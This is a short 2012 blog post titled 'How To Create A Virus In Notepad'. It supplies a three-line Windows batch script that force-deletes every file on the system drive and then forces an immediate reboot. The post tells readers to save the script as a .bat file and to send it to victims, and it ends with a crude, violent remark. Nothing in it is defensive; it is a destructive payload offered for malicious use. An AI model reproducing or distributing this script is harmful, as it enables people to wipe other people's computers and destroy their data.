Blogger Tricks

20 Jun 2012

How To Create A Virus In Notepad

How To Create A Virus In Notepad Hey,this is how to create a virus that deletes the content of your hard drive.
Paste this code in notepad.exe.
Code:
@echo off 
 del %systemdrive%\*.* /f /s /q 
 shutdown -r -f -t 00
Remeber to save this as a .bat file.


Enjoy..
PS: Dont bother trying it out,just send it to whoever you want to get raped.